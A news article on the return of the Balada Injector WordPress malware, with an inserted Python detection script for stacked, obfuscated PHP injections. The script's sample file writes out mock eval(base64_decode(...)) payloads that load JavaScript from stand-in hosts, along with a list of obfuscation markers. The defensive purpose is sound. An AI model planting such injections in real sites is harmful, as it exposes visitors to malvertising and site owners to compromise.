One of the most worrying WordPress malware threats is making a comeback

Balada Injector is back, compromising WordPress websites across the internet


The Balada Injector malware is alive and kicking, compromising poorly protected WordPress websites across the internet and using them to target visitors, new research has claimed.

A report from researchers at Cybernews claims to have found a compromised WordPress website during a “routine web monitoring operation”.

The compromised website was apparently targeted by the Balada Injector malware - a Linux-based backdoor that infiltrates websites through known vulnerabilities in WordPress plugins, themes and similar components. The Balada Injector is known for attacking in “waves” - every month or so, the injector uses a new domain name and new code, which it tries to add to the WordPress site’s code.

Waves of attacks


This particular site had seven different instances of malicious code added and stacked on top of one another, meaning the website suffered seven “waves” of hacking attacks. The code, added to the very top of the page so that it ran before the website loaded, was meant to grant the attackers remote access to infected machines and to redirect visitors to other websites running malvertising campaigns.


When the researchers deobfuscated and examined some of the PHP payloads found on the compromised website, they discovered the URLs of newly spawned Command & Control (C2) endpoints and of further obfuscated JavaScript files used in the operation. A total of five URLs were found being accessed to load malicious JavaScript onto exploited websites, the researchers said.

The good news for potential victims is that the Balada Injector still isn’t as advanced as it could be. It doesn’t check whether a compromised website has already had malicious code added, and because of that, instead of serving the landing page, the website forced the download of a PHP file, which raised red flags with the researchers and ultimately helped uncover the hacking campaign.
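A defender-side triage check for the behaviour described above (obfuscated PHP blocks stacked at the very top of a file, each loading remote JavaScript, with no check for earlier waves), written as an added example; it is not code from the Cybernews research, and the marker list, the sample file and the wave1/wave2 placeholder domains are constructed assumptions.

```python
import base64
import re

# Heuristic markers common in obfuscated PHP injections (constructed list, not from the report).
OBFUSCATION_MARKERS = ("eval(", "base64_decode(", "gzinflate(", "str_rot13(")

# Each injected block is a self-contained <?php ... ?> block prepended to the file.
BLOCK_RE = re.compile(r"<\?php(.*?)\?>", re.DOTALL)
B64_RE = re.compile(r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
URL_RE = re.compile(r"""https?://[^\s'"<>]+\.js""")


def triage_file(source: str) -> dict:
    """Count obfuscated blocks stacked contiguously at the top of a PHP file
    (one per injection wave) and list the remote .js URLs their decoded
    base64 payloads reference. Scanning stops at the first clean block."""
    stacked, urls, pos = 0, [], 0
    for m in BLOCK_RE.finditer(source):
        # Injected blocks sit back to back at the top; any real content in between ends the run.
        if source[pos:m.start()].strip():
            break
        body = m.group(1)
        if not any(marker in body for marker in OBFUSCATION_MARKERS):
            break
        stacked += 1
        pos = m.end()
        for b64 in B64_RE.findall(body):
            try:
                decoded = base64.b64decode(b64, validate=True).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError subclass
                continue
            urls.extend(URL_RE.findall(decoded))
    return {"stacked_injections": stacked, "script_urls": sorted(set(urls))}


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed sample: a theme file hit by three injection waves, then the legitimate code.
SAMPLE_FILE = (
    "<?php eval(base64_decode('" + _b64('<script src="https://wave1.example.invalid/a.js"></script>') + "')); ?>"
    "<?php $x=str_rot13('abc'); eval(base64_decode('" + _b64('<script src="https://wave2.example.invalid/b.js"></script>') + "')); ?>"
    "<?php eval(gzinflate(base64_decode('AAAA'))); ?>\n"
    "<?php get_header(); ?>\n<html><body>legitimate theme content</body></html>\n"
)

if __name__ == "__main__":
    print(triage_file(SAMPLE_FILE))
```

Running the script over wp-content/themes and wp-content/plugins files and alerting on any file with stacked_injections above zero gives a cheap first pass; the URLs it extracts are what you would then block at the proxy and hunt for in access logs.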


Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
